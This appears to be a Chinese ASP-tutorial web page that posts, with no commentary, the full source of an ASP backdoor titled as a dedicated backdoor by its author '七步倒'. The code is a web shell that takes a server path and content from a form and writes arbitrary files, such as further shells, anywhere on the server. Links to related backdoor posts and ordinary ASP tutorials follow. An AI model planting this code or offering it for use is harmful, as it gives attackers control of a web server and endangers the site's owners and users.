- <html>
- <head>
- <title>七步倒┈→专用asp后门</title>
- </head>
- </html>
- <%dim objFSO%>
- <%dim fdata%>
- <%dim objCountFile%>
- <%on error resume next%>
- <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
- <%if Trim(request("syfdpath"))<>"" then%>
- <%fdata = request("cyfddata")%>
- <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
- <%objCountFile.Write fdata%>
- <%if err =0 then%>
- <%response.write "<font color=blue>Save Success!</font>"%>
- <%else%>
- <%response.write "<font color=red>Save UnSuccess!</font>"%>
- <%end if%>
- <%err.clear%>
- <%end if%>
- <%objCountFile.Close%>
- <%Set objCountFile=Nothing%>
- <%Set objFSO = Nothing%>
- <%Response.write "<form action='''' method=post>"%>
- <%Response.write "<font color=blue>save file绝对路径:</font>"%>
- <%Response.Write "<input type=text name=syfdpath width=32 size=50>"%>
- <%Response.Write "<br>"%>
- <%Response.write "<font color=red>file of 绝对路径"%>
- <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
- <%Response.write "<br>"%>
- <%Response.write "input:"%>
- <%Response.write "<textarea name=cyfddata cols=80 rows=10
- width=50></textarea>"%>
- <%Response.write "<input type=submit value=save>"%>
- <%Response.write "</form>"%>
- BY:七步倒
七步倒┈→专用asp后门
2019-10-14 11:26七步倒 ASP教程
七步倒┈→专用asp后门
延伸 · 阅读
- 2019-09-29几种另类的ASP后门
- 2019-09-16最小asp后门程序
- 2019-09-02隐蔽的ASP后门 大家可以查看下
精彩推荐
- ASP教程
ASP七大对象说明分析
ASP七大对象说明分析,复习了ASP,加深了对ASP结构的理解和ASP的体会,可以用来做ASP参考,自己写的,参考起来更方便...
- ASP教程
asp下实现字符串的补充fill()
在一个字符串前后补全另一字符串,在一个字符串前面补全另一字符串,在一个字符串后面补全另一字符串 ...
- ASP教程
ASP新闻分页,将一篇过长的文章分页,生成静态页面
现在将他们生成静态页面没有什么问题,但是如何将它们按照某种规则,生成编号为20030405-1.htm 20030405-2.htm 20030405-3.htm这样的静态文件呢? ...
- ASP教程
检查access数据库中是否存在某个名字的表的asp代码
首先调用adodb.connection对象中的openSchema函数,这样会得到一个Recordset,其中每一条“纪录”对应着数据库中的一张表,“纪录”的每个“字段”包含了对应...
- ASP教程
asp+JMAIL实现发送邮件
这篇文章主要介绍了asp+JMAIL实现发送邮件实例代码,感兴趣的小伙伴们可以参考一下...
- ASP教程
Asp实现的数据库连接池功能函数分享
这篇文章主要介绍了Asp实现的数据库连接池功能函数分享,本函数能够加快网页的访问速度,降低数据库的压力,需要的朋友可以参考下...
- ASP教程
ASP函数大全解析
这篇文章主要对ASP函数大全进行了解析,需要的朋友可以参考下...
- ASP教程
ASP Err.Number 错误描述详解
在编写asp的过程中,难免出现各种各样的错误,我们可以通过ASP Err.Number输出错误代码,快速找到问题的根源。...